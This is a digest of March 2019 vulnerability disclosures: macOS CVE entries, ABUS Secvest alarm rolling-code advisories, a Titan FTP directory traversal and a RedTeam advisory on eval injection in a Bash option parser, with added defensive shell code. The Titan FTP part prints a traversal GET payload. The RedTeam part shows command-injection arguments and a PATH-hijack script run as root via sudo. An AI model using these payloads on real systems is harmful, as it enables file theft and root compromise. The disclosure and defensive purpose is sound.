DiskArbitration
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: An encrypted volume may be unmounted and remounted by a
different user without prompting for the password
Description: A logic issue was addressed with improved state
management.
CVE-2019-8522: Colin Meginnis (@falc420)

FaceTime
Available for: macOS Mojave 10.14.3
Impact: A user's video may not be paused in a FaceTime call if they
exit the FaceTime app while the call is ringing
Description: An issue existed in the pausing of FaceTime video. The
issue was resolved with improved logic.
CVE-2019-8550: Lauren Guzniczak of Keystone Academy

Feedback Assistant
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to gain root privileges
Description: A race condition was addressed with additional
validation.
CVE-2019-8565: CodeColorist of Ant-Financial LightYear Labs

Feedback Assistant
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A malicious application may be able to overwrite arbitrary
files
Description: This issue was addressed with improved checks.
CVE-2019-8521: CodeColorist of Ant-Financial LightYear Labs

file
Available for: macOS Mojave 10.14.3
Impact: Processing a maliciously crafted file might disclose user
information
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-6237: an anonymous researcher

Graphics Drivers
Available for: macOS Mojave 10.14.3
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-8519: Aleksandr Tarasikov (@astarasikov), Juwei Lin
(@panicaII) and Junzhi Lu of Trend Micro Research working with Trend
Micro's Zero Day Initiative

iAP
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

IOGraphics
Available for: macOS Mojave 10.14.3
Impact: A Mac may not lock when disconnecting from an external
monitor
Description: A lock handling issue was addressed with improved lock
handling.
CVE-2019-8533: an anonymous researcher, James Eagan of Télécom
ParisTech, R. Scott Kemp of MIT, Romke van Dijk of Z-CERT

IOHIDFamily
Available for: macOS Mojave 10.14.3
Impact: A local user may be able to cause unexpected system
termination or read kernel memory
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team

IOKit
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8504: an anonymous researcher

IOKit SCSI
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-8529: Juwei Li

[FD] [SYSS-2018-036]: ABUS Secvest Remote Control - Denial of Service - Uncontrolled Resource Consumption (CWE-400)

2019-03-26 Thread Matthias Deeg
Advisory ID: SYSS-2018-036
Product: ABUS Secvest Remote Control (FUBE50014, FUBE50015)
Manufacturer: ABUS
Affected Version(s): n/a
Tested Version(s): n/a
Vulnerability Type: Denial of Service - Uncontrolled Resource
Consumption (CWE-400)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2018-11-21
Solution Date: -
Public Disclosure: 2019-03-25
CVE Reference: CVE-2019-9860
Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert



Overview:

ABUS Secvest FUBE50014 and FUBE50015 are wireless remote controls for
the ABUS Secvest wireless alarm system.

Some of the device features as described by the manufacturer are
(see [1]):

"
* User-friendly remote control with easily identifiable symbols
* Features ‘arm’, ‘disarm’ and ‘status query’ keys
* 8 LEDs provide an overview and display current system status
* Button for custom configuration available (Secvest wireless alarm
  system only)
* Optional manual panic alarm available (Secvest wireless alarm system
  only)
* Encrypted signal transmission
* Rolling Code
  Thanks to the rolling code process this product is protected against
  so-called replay attacks. All controlling signals between this product
  and the Secvest alarm panel are in individualised and thus, are not
  able to be reproduced by third parties. This process is protected
  from third party tampering, and exceeds the requirements of the
  DIN EN 50131-1 level 2 security standard.
"

Due to unencrypted signal communication and predictability of rolling
codes, an attacker can "desynchronize" an ABUS Secvest wireless remote
control regarding its controlled Secvest wireless alarm system, so that
sent commands by the remote control are not accepted anymore.



Vulnerability Details:

Thomas Detert found out that the claimed "Encrypted signal transmission"
of the Secvest wireless remote control FUBE50014 is not present (see
SySS security advisory SYSS-2018-035 [2]) and that the implemented
rolling codes are predictable (see SySS security advisory SYSS-2018-034
[3]).

By exploiting these two security issues, an attacker can simply
desynchronize a wireless remote control by observing the current rolling
code state, generating many valid rolling codes, and use them before the
original wireless remote control.

The Secvest wireless alarm system will ignore sent commands by the
wireless remote control until the generated rolling code happens to
match the window of valid rolling code values again. Depending on the
number of used rolling codes by the attacker, a resynchronization
without actually reconfiguring the wireless remote control could take
quite a lot of time and effectless button presses.

SySS found out that the new ABUS Secvest remote control FUBE50015 is
also affected by this security vulnerability.



Proof of Concept (PoC):

Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz
transceiver that allows disarming the alarm system in an unauthorized
way. He provided his tool including documentation and source to SySS
GmbH for responsible disclosure purposes.

Based on Mr. Detert's PoC tool, SySS GmbH developed a Python tool for
the RFCat-based radio dongle YARD Stick One (see [4]) for demonstrating
this simple denial-of-service (DoS) attack against the ABUS Secvest
wireless remote controls FUBE50014 and FUBE50015. This tool simply
generates many valid rolling codes based on the current observed state
and uses them resulting in desynchronizing the original wireless remote
control.



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2018-11-21: Vulnerability reported to manufacturer
2018-11-28: Vulnerability reported to manufacturer once more
2018-12-12: E-mail to ABUS support asking if they are going to give
some feedback regarding the reported security issue
2018-12-12: Phone call with ABUS support, the reported security
advisories were forwarded to the ABUS Security Center
Support
2018-12-12: E-mail to ABUS Security Center Support asking if they are
going to give some feedback regarding the reported security
issue
2019-01-14: Updated information regarding remote control ABUS Secvest
FUBE50015
2019-03-25: Public release of security advisory



References:

[1] Product website for ABUS Secvest wireless remote control

https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Wireless-Remote-Control2
[2] SySS Security Advisory SYSS-2018-0

[FD] [SYSS-2018-035]: ABUS Secvest Remote Control - Missing Encryption of Sensitive Data (CWE-311)

2019-03-26 Thread Matthias Deeg
Advisory ID: SYSS-2018-035
Product: ABUS Secvest Remote Control (FUBE50014, FUBE50015)
Manufacturer: ABUS
Affected Version(s): n/a
Tested Version(s): n/a
Vulnerability Type: Missing Encryption of Sensitive Data (CWE-311)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2018-11-21
Solution Date: -
Public Disclosure: 2019-03-25
CVE Reference: CVE-2019-9862
Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert



Overview:

ABUS Secvest FUBE50014 and FUBE50015 are wireless remote controls for
the ABUS Secvest wireless alarm system.

Some of the device features as described by the manufacturer are
(see [1]):

"
* User-friendly remote control with easily identifiable symbols
* Features ‘arm’, ‘disarm’ and ‘status query’ keys
* 8 LEDs provide an overview and display current system status
* Button for custom configuration available (Secvest wireless alarm
  system only)
* Optional manual panic alarm available (Secvest wireless alarm system
  only)
* Encrypted signal transmission
* Rolling Code
  Thanks to the rolling code process this product is protected against
  so-called replay attacks. All controlling signals between this product
  and the Secvest alarm panel are in individualised and thus, are not
  able to be reproduced by third parties. This process is protected
  from third party tampering, and exceeds the requirements of the
  DIN EN 50131-1 level 2 security standard.
"

Due to the missing "Encrypted signal transmission", an attacker is able
to eavesdrop sensitive data as cleartext, for instance the current
rolling code state.



Vulnerability Details:

Thomas Detert found out that the claimed "Encrypted signal transmission"
of the Secvest wireless remote control FUBE50014 is not present at all.

Thus, an attacker observing radio signals of an ABUS FUBE50014
wireless remote control is able to see all sensitive data of
transmitted packets as cleartext and can analyze the used packet format
and the communication protocol.

For instance, this security issue could successfully be exploited to
observe the current rolling code state of the wireless remote control
and deduce the cryptographically weak used rolling code algorithm
(see SySS security advisory SYSS-2018-034 [2]).

SySS found out that the new ABUS Secvest remote control FUBE50015 is
also affected by this security vulnerability.



Proof of Concept (PoC):

Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz
transceiver that allows disarming the alarm system in an unauthorized
way. He provided his tool including documentation and source to SySS
GmbH for responsible disclosure purposes.

SySS GmbH could successfully perform a disarming attack against an ABUS
Secvest wireless alarm system by exploiting the unencrypted signal
transmission of the ABUS Secvest wireless remote controls FUBE50014 and
FUBE50015 and the predictable rolling code implementation using either
Mr. Detert's PoC tool, a developed Python tool for the RFCat-based radio
dongle YARD Stick One (see [3]), or an eZ430-Chronos (see [4]) with a
specially developed firmware.

Successful disarming attacks against an ABUS Secvest wireless alarm
system are shown in our SySS proof-of-concept video "ABUS Secvest
Rolling Code PoC Attack" [7].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2018-11-21: Vulnerability reported to manufacturer
2018-11-28: Vulnerability reported to manufacturer once more
2018-12-12: E-mail to ABUS support asking if they are going to give
some feedback regarding the reported security issue
2018-12-12: Phone call with ABUS support, the reported security
advisories were forwarded to the ABUS Security Center
Support
2018-12-12: E-mail to ABUS Security Center Support asking if they are
going to give some feedback regarding the reported security
issue
2019-01-14: Updated information regarding remote control ABUS Secvest
FUBE50015
2019-03-25: Public release of security advisory



References:

[1] Product website for ABUS Secvest wireless remote control

https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Wireless-Remote-Control2
[2] SySS Security Advisory SYSS-2018-034

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-034.txt
[3] Product website YARD Stick One
https://greatscottgadgets.com/yardstickone/
[4] Product website for Texas Instruments eZ430-Chronos
http://ww

[FD] [SYSS-2018-034]: ABUS Secvest - Rolling Code - Predictable from Observable State (CWE-341)

2019-03-26 Thread Matthias Deeg
Advisory ID: SYSS-2018-034
Product: ABUS Secvest (FUAA5)
Manufacturer: ABUS
Affected Version(s): v3.01.01
Tested Version(s): v3.01.01
Vulnerability Type: Rolling Code - Predictable from Observable State
(CWE-341)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2018-11-21
Solution Date: -
Public Disclosure: 2019-03-25
CVE Reference: CVE-2019-9863
Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert



Overview:

ABUS Secvest (FUAA5) is a wireless alarm system with different
features.

Some of the supported features as described by the manufacturer are
(see [1]):

"
* Convenient operation via the app (Android/iOS), integrated web
  browser and also at the alarm panel
* For up to 50 users with freely selectable control options
  (code/chip key/remote control)
* Active intrusion protection in combination with additional mechatronic
  wireless window/door locks
* Video verification of alarms via email, push notifications or via the
  app
* Up to 48 individually identifiable wireless detectors, eight control
  panels, 50 remote controls
* Integrated dialling device
* VdS Home certified and EN 50131-1 Level 2
* Alarm verification via the integration of up to six IP cameras
* 32 additional wireless outputs for flexible event control
* Switching to monitoring station via protocols possible
"

Due to the use of an insecure algorithm for rolling codes, an attacker
is able to predict valid future rolling codes and can thus remotely
control the ABUS Secvest wireless alarm system in an unauthorized way.



Vulnerability Details:

Thomas Detert found out that the rolling codes implemented as replay
protection (see SySS security advisory SYSS-2016-117 [2]) in the radio
communication protocol used by the ABUS Secvest wireless alarm system
(FUAA5) and its remote control (FUBE50014, FUBE50015) is
cryptographically weak. Thus, an attacker observing the unencrypted radio
signals of an ABUS FUBE50014 or FUBE50015 wireless remote control
(see SySS security advisory SYSS-2018-035 [6]) is able to deduce the
implemented rolling code algorithm and to correctly predict valid future
rolling codes.

This enables an attacker to remotely control affected wireless alarm
systems in an unauthorized manner, for instance disarming the wireless
alarm system at will.



Proof of Concept (PoC):

Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz
transceiver that allows disarming the alarm system in an unauthorized
way. He provided his tool including documentation and source to SySS
GmbH for responsible disclosure purposes.

SySS GmbH could successfully perform a disarming attack against an ABUS
Secvest wireless alarm system by exploiting the unencrypted signal
transmission of the ABUS Secvest wireless remote controls FUBE50014 and
FUBE50015 and the predictable rolling code implementation using either
Mr. Detert's PoC tool, a developed Python tool for the RFCat-based radio
dongle YARD Stick One (see [3]), or an eZ430-Chronos (see [4]) with a
specially developed firmware.

Successful disarming attacks against an ABUS Secvest wireless alarm
system are shown in our SySS proof-of-concept video "ABUS Secvest
Rolling Code PoC Attack" [8].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2018-11-21: Vulnerability reported to manufacturer
2018-11-28: Vulnerability reported to manufacturer once more
2018-12-12: E-mail to ABUS support asking if they are going to give
some feedback regarding the reported security issue
2018-12-12: Phone call with ABUS support, the reported security
advisories were forwarded to the ABUS Security Center
Support
2018-12-12: E-mail to ABUS Security Center Support asking if they are
going to give some feedback regarding the reported security
issue
2019-01-14: Updated information regarding remote control ABUS Secvest
FUBE50015
2019-03-25: Public release of security advisory



References:

[1] Product website for ABUS Secvest wireless alarm system

https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System
[2] SySS Security Advisory SYSS-2016-117

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-117.txt
[3] Product website YARD Stick One
https://greatscottgadgets.com/yardstickone/
[4] Product website for Texas Instruments eZ430-Chronos
http://www.ti.com/tool/EZ430-CHRONOS
[5] SySS Security Advisory SYSS

[FD] CVE-2019-10009 Titan FTP Server Version 2019 Build 3505 Directory Traversal/Local File Inclusion

2019-03-26 Thread Kevin R
**
Discovered By: Kevin Randall on 3/23/2019
**
A Directory Traversal issue was discovered in the Web GUI in Titan FTP
Server 2019 Build 3505.
When an authenticated user attempts to preview an uploaded file (through
PreviewHandler.ashx) by using a \..\..\ technique, arbitrary files can
be loaded in the server response outside the root directory.
***
Tools used:

Parrot OS

Windows 7 32 Bit

BurpSuite

Browser
*
Vulnerability has been fixed in the following build:
Build: Titan FTP Server 2019 Build 3515
**
Proof of Concept (PoC):

Step 1: Authenticate through Titan FTP Web GUI

Step 2: Upload file and attempt to view it

Step 3: Intercept requests with BurpSuite when attempting to view uploaded
file

Step 4: Modify "path=" and "filename=" parameters in the following GET
request:
Ex: View contents of README.txt file in Python27 directory:
Note: You can access other files in directories such as System32, Desktop
etc.
Payload:
*
GET
/PreviewHandler.ashx?path=\..\..\..\..\Python27\README.txt&filename=README.txt
*
Step 5: If path is set-up correctly and if file exists, you will receive a
200 OK back from the server.

Step 6: View the file through the file preview in the FTP server.
**

**
Timeline:

Date Discovered: 3/23/2019
Date Disclosed to Vendor: 3/23/2019
CVE Obtained: 3/24/2019
Vendor Created Patched Version Titan FTP Version 2019 Build 3515: 3/25/2019
Vendor Created Entry in Jira System for issue (SVR-499): 3/25/2019
Date Disclosed: 3/26/2019

**

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
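The traversal above works because the preview handler joins the user-supplied "path=" value onto the upload root without checking where the result ends up. The shell function below is an added example, not Titan FTP code, of the containment check a server should apply before opening a requested file: treat both "/" and "\" as separators, resolve "." and "..", and refuse any request that is absolute, carries a drive letter, or climbs above the root. The root directory `/srv/ftp` used in the demo and the function names are assumptions for the illustration.

```shell
#!/bin/sh
# Added example: containment check for a file-preview request such as the
# "path=" parameter of Titan FTP's PreviewHandler.ashx. Not Titan FTP code;
# the root directory and the function names are assumptions.

# Prints the normalized absolute path of REQUEST under ROOT and returns 0.
# Returns 1 (printing nothing) when the request is absolute, names a drive
# letter, or uses ".." to climb above ROOT. Both "/" and "\" count as
# separators, as they do on the Windows server the advisory describes.
safe_preview_path() {
    spp_root=$1
    # Map backslashes to slashes before any other check, otherwise
    # "\..\..\" would slip past a check that only knows about "/".
    spp_req=$(printf '%s' "$2" | tr '\\' '/')
    case $spp_req in
        /*|?:*) return 1 ;;             # absolute path or drive letter
    esac
    spp_depth=0
    spp_out=''
    # Split on "/" with globbing disabled, so a segment like "*" stays literal.
    case $- in *f*) spp_hadf=1 ;; *) spp_hadf=0 ;; esac
    spp_oldifs=$IFS
    IFS=/
    set -f
    set -- $spp_req
    [ "$spp_hadf" -eq 1 ] || set +f
    IFS=$spp_oldifs
    for spp_seg in "$@"; do
        case $spp_seg in
            ''|.) ;;                    # doubled separator or current directory
            ..)
                # Climbing above the root is the traversal itself: refuse it
                # outright rather than silently clamping to the root.
                [ "$spp_depth" -gt 0 ] || return 1
                spp_depth=$((spp_depth - 1))
                spp_out=${spp_out%/*}
                ;;
            *)
                spp_depth=$((spp_depth + 1))
                spp_out=$spp_out/$spp_seg
                ;;
        esac
    done
    printf '%s\n' "$spp_root$spp_out"
}

# Demo: classify each command-line argument as a constructed preview request.
preview_demo() {
    for spp_arg in "$@"; do
        if spp_path=$(safe_preview_path /srv/ftp "$spp_arg"); then
            echo "allow: $spp_arg -> $spp_path"
        else
            echo "deny:  $spp_arg"
        fi
    done
}

# Run the demo only when arguments are given, so the file can also be sourced.
[ $# -eq 0 ] || preview_demo "$@"
```

Running the script with `'docs\..\report.txt'` and `'\..\..\..\..\Python27\README.txt'` as arguments shows the first request resolved to a path inside the root and the second denied at its first ".." component. The check is deliberately strict (it refuses rather than clamps) because a clamped request still tells an attacker how many ".." components the handler tolerates.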


[FD] Recon 2019 Call For Papers - June 28 - 30, 2019 - Montreal, Canada

2019-03-26 Thread cfp
Recon Montreal - Call For Papers - June 28 - 30 - 2019
Welcome to TeleMate!
ATDT1514XXX
CONNECT 300 
..
DATAPAC :  

DATAPAC: Call connected to  

This is a private system.  Access attempts are logged.  Unauthorized 
access may result in prosecution.

Bienvenue!

  
++ + +   
  +  +   +
   + +
\ /
   + _- _+_ -   ,__
 _=..:. /=\   _|===|_  ||::|
|  |_|.|   | | |   | | __===_  -=- ||::|
|==|   |  |  __|.:.|   /\| |:. | ||   | .|| : |||::|
|  |-  |.:|_|. :__ |.: |--|==| |  .| |_   | ' |. ||.  |||:.|
  __|. | |_|. | |.|...||---|  |==| |   | | |_--. ||   |||. |
 |  |  |   |. | | |::.||: .|  |==| | . : |=|===|:|| . ||| .| 
 |:.| .|   |  | | |:.:|| . |  |==| | |=|===| .   |'   | |  |
 | |  |   |   |'   :   .   |   ; ;'|
 ' :  `   :   '.   '  .  . :
 ' .   R E C O N 2 0 1 9 .
 `..   '
   .   C F P
   .
june 28 to 30, 2019
  montreal, quebec   .  
  
   
  + Hi - Flash back from 2008 ..
  
  + We are back
  
  ╔═╩╗
  #   C F P  #
  ╚══╗
  We are now inviting speakers to submit proposals   ║
  for Recon Montreal 2019.   ║
 ║
  Some guidelines for talks are: ║
 ║
   - 30 or 60 minute presentations   ║
 ║
   - We are open to proposals for workshops that would occur alongside   ║
 talks   ║
 ║
   - There will be time for five to ten minute informal lightning talks  ║
 during the REcon party  ║
 ║
 ║
 ║
  ╔══╝
  ╚══╗
 ║
   _ _ _ ║
  |  _ \ ___  __ _(_)___| |_ _ __ __ _| |_(_) ___  _ __  ║
  | |_) / _ \/ _` | / __| __| '__/ _` | __| |/ _ \| '_ \ ║
  |  _ <  __/ (_| | \__ \ |_| | | (_| | |_| | (_) | | | | █╗ ║
  |_| \_\___|\__, |_|___/\__|_|  \__,_|\__|_|\___/|_| |_|  ║ ║
 |___/ ║ ║
   ║ ║
  Registration for the conference and training sessions is now open.   ║ ║
 - - - - - - - -   ║ ║
  You can register at: https://tickets.recon.cx/reconmtl/2019/ ║ ║
   ║ ║
   ║ ║
   ║ ║
   ║ ║
   _  _   █╩═╣
  |_   _| __ __ _(_)_ __ (_)_ __   __ _  ║
| || '__/ _` | | '_ \| | '_ \ / _` | ║
| || | | (_| | | | | | | | | | (_| | ║
|_||_|  \__,_|_|_| |_|_|_| |_|\__, |   █═══╗ ║
  |___/║ ║
   ║ ║
   ║ ║
  This year we have another great set of trainings available:  ║ ║
   ║ ║
  

[FD] Repeat of CVE-2018-4251 in Razer Laptops

2019-03-26 Thread Bailey Fox
Razer has a vulnerability affecting all current laptops, where the SPI
Flash is set to full read/write and the Intel CPU is left in ME
Manufacturing Mode. This allows for attackers to safeguard rootkits with
Intel Boot Guard, downgrade the BIOS to exploit older vulnerabilities such
as Meltdown, and many other things. They have yet to look into getting a
CVE assigned, saying it isn't necessary.



[FD] [RT-SA-2019-007] Code Execution via Insecure Shell Function getopt_simple

2019-03-26 Thread RedTeam Pentesting GmbH
Advisory: Code Execution via Insecure Shell Function getopt_simple

RedTeam Pentesting discovered that the shell function "getopt_simple",
as presented in the "Advanced Bash-Scripting Guide", allows execution of
attacker-controlled commands.


Details
=======

Product: Advanced Bash-Scripting Guide
Affected Versions: all
Fixed Versions: -
Vulnerability Type: Code Execution
Security Risk: medium
Vendor URL: https://www.tldp.org/LDP/abs/html/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-007
Advisory Status: private
CVE: CVE-2019-9891
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9891


Introduction
============

The document "Advanced Bash-Scripting Guide" [1] is a tutorial for
writing shell scripts for Bash. It contains many example scripts
together with in-depth explanations about how shell scripting works.


More Details
============

During a penetration test, RedTeam Pentesting was able to execute
commands as an unprivileged user (www-data) on a server. Among others,
it was discovered that this user was permitted to run the shell script
"cleanup.sh" as root via "sudo":


$ sudo -l
Matching Defaults entries for user on srv:
env_reset, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on srv:
(root) NOPASSWD: /usr/local/sbin/cleanup.sh


The script "cleanup.sh" starts with the following code:


#!/bin/bash

getopt_simple()
{
    until [ -z "$1" ]
    do
      if [ ${1:0:2} = '--' ]
      then
          tmp=${1:2}               # Strip off leading '--' . . .
          parameter=${tmp%%=*}     # Extract name.
          value=${tmp##*=}         # Extract value.
          eval $parameter=$value
      fi
      shift
    done
}

target=/tmp

# Pass all options to getopt_simple().
getopt_simple $*

# list files to clean
echo "listing files in $target"
find "$target" -mtime 1


The function "getopt_simple" is used to set variables based on
command-line flags which are passed to the script. Calling the script
with the argument "--target=/tmp" sets the variable "$target" to the
value "/tmp". The variable's value is then used in a call to "find". The
source code of the "getopt_simple" function has been taken from the
"Advanced Bash-Scripting Guide" [2]. It was also published as a book.
RedTeam Pentesting identified two different ways to exploit this
function in order to run attacker-controlled commands as root.

First, a flag can be specified in which either the name or the value
contain a shell command. The call to "eval" will simply execute this
command.


$ sudo /usr/local/sbin/cleanup.sh '--redteam=foo;id'
uid=0(root) gid=0(root) groups=0(root)
listing files in /tmp

$ sudo /usr/local/sbin/cleanup.sh '--target=$(id)'
listing files in uid=0(root) gid=0(root) groups=0(root)
find: 'uid=0(root) gid=0(root) groups=0(root)': No such file or directory

$ sudo /usr/local/sbin/cleanup.sh '--target=$(ls${IFS}/)'
listing files in bin
boot
dev
etc
[...]


Instead of injecting shell commands, the script can also be exploited by
overwriting the "$PATH" variable:


$ mkdir /tmp/redteam

$ cat <<EOF > /tmp/redteam/find
#!/bin/sh
echo "executed as root:"
/usr/bin/id
EOF

$ chmod +x /tmp/redteam/find

$ sudo /usr/local/sbin/cleanup.sh --PATH=/tmp/redteam
listing files in /tmp
executed as root:
uid=0(root) gid=0(root) groups=0(root)



Workaround
==========

No workaround available.


Fix
===

Replace the function "getopt_simple" with the built-in function
"getopts" or the program "getopt" from the util-linux package.
Examples on how to do so are included in the same tutorial [3][4].


Security Risk
=============

If a script with attacker-controlled arguments uses the "getopt_simple"
function, arbitrary commands may be invoked by the attackers. This is
particularly interesting if a privilege boundary is crossed, for example
in the context of "sudo". Overall, this vulnerability is rated as a
medium risk.


Timeline
========

2019-02-18 Vulnerability identified
2019-03-20 Customer approved disclosure to vendor
2019-03-20 Author notified
2019-03-20 Author responded, document is not updated/maintained any more
2019-03-20 CVE ID requested
2019-03-21 CVE ID assigned
2019-03-26 Advisory released 


References
==========

[1] https://www.tldp.org/LDP/abs/html/
[2] https://www.tldp.org/LDP/abs/html/string-manipulation.html#GETOPTSIMPLE
[3] https://www.tldp.org/LDP/
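A hardened replacement for the parser, as an added example that is not part of the RedTeam advisory or of the Advanced Bash-Scripting Guide: the "--name=value" form is kept, but every accepted option is assigned explicitly in its own `case` branch, so no attacker-controlled text ever reaches `eval` and a variable such as `PATH` cannot be set through the command line at all. A second parser shows the short-option form with the `getopts` builtin that the Fix section recommends. The option names (`--target`, `--days`), the value allow-lists and the `cleanup_main` wrapper are assumptions for the illustration, modelled on the `cleanup.sh` shown above.

```shell
#!/bin/sh
# Added example: a replacement for the ABS "getopt_simple" function that
# never passes user input to eval. Option names (--target, --days) and the
# cleanup_main wrapper are assumptions for this illustration.

# Parses "--target=DIR" and "--days=N" into TARGET and DAYS (shell functions
# share the caller's variables, so the results are handed back that way).
# Unknown options, malformed values and stray positional arguments make the
# function return 1 so the caller can abort before anything is executed.
parse_cleanup_opts() {
    TARGET=/tmp
    DAYS=1
    while [ $# -gt 0 ]; do
        case $1 in
            --target=*)
                TARGET=${1#--target=}
                # Conservative allow-list for the path (letters, digits, _ . / -);
                # widen it if real paths need more, but never fall back to eval.
                case $TARGET in
                    ''|*[!A-Za-z0-9_./-]*) return 1 ;;
                esac
                ;;
            --days=*)
                DAYS=${1#--days=}
                case $DAYS in
                    ''|*[!0-9]*) return 1 ;;
                esac
                ;;
            --)
                shift
                break
                ;;
            *)
                # Anything else, including --PATH=... or '--foo=bar;id', is
                # rejected: there is no indirect assignment, so no variable
                # name can be smuggled in through an option.
                return 1
                ;;
        esac
        shift
    done
    # Positional arguments are not part of this script's interface.
    [ $# -eq 0 ] || return 1
    return 0
}

# Same interface with short options (-t DIR, -d N) via the getopts builtin,
# which the advisory's Fix section recommends instead of getopt_simple.
parse_cleanup_getopts() {
    TARGET=/tmp
    DAYS=1
    OPTIND=1                      # reset so the function can be called repeatedly
    while getopts 't:d:' opt; do
        case $opt in
            t) TARGET=$OPTARG ;;
            d) DAYS=$OPTARG ;;
            *) return 1 ;;        # getopts has already reported the bad option
        esac
    done
    shift $((OPTIND - 1))
    [ $# -eq 0 ] || return 1
    case $TARGET in
        ''|*[!A-Za-z0-9_./-]*) return 1 ;;
    esac
    case $DAYS in
        ''|*[!0-9]*) return 1 ;;
    esac
    return 0
}

# What the original cleanup.sh did after parsing, with every value quoted.
cleanup_main() {
    if ! parse_cleanup_opts "$@"; then
        echo "usage: $0 [--target=DIR] [--days=N]" >&2
        return 2
    fi
    echo "listing files in $TARGET"
    find "$TARGET" -mtime "$DAYS"
}

# Run only when the script is given arguments, so sourcing it for the parsers
# has no side effects.
[ $# -eq 0 ] || cleanup_main "$@"
```

With this parser the three injection attempts from the advisory (`'--redteam=foo;id'`, `'--target=$(id)'` and `--PATH=/tmp/redteam`) all end in the usage message with exit status 2, and `find` is never reached. The value allow-lists are defense in depth: because the values are only ever expanded inside double quotes and never evaluated, the shell itself would already be safe, but a narrow character set also protects any less careful code the value is later passed to.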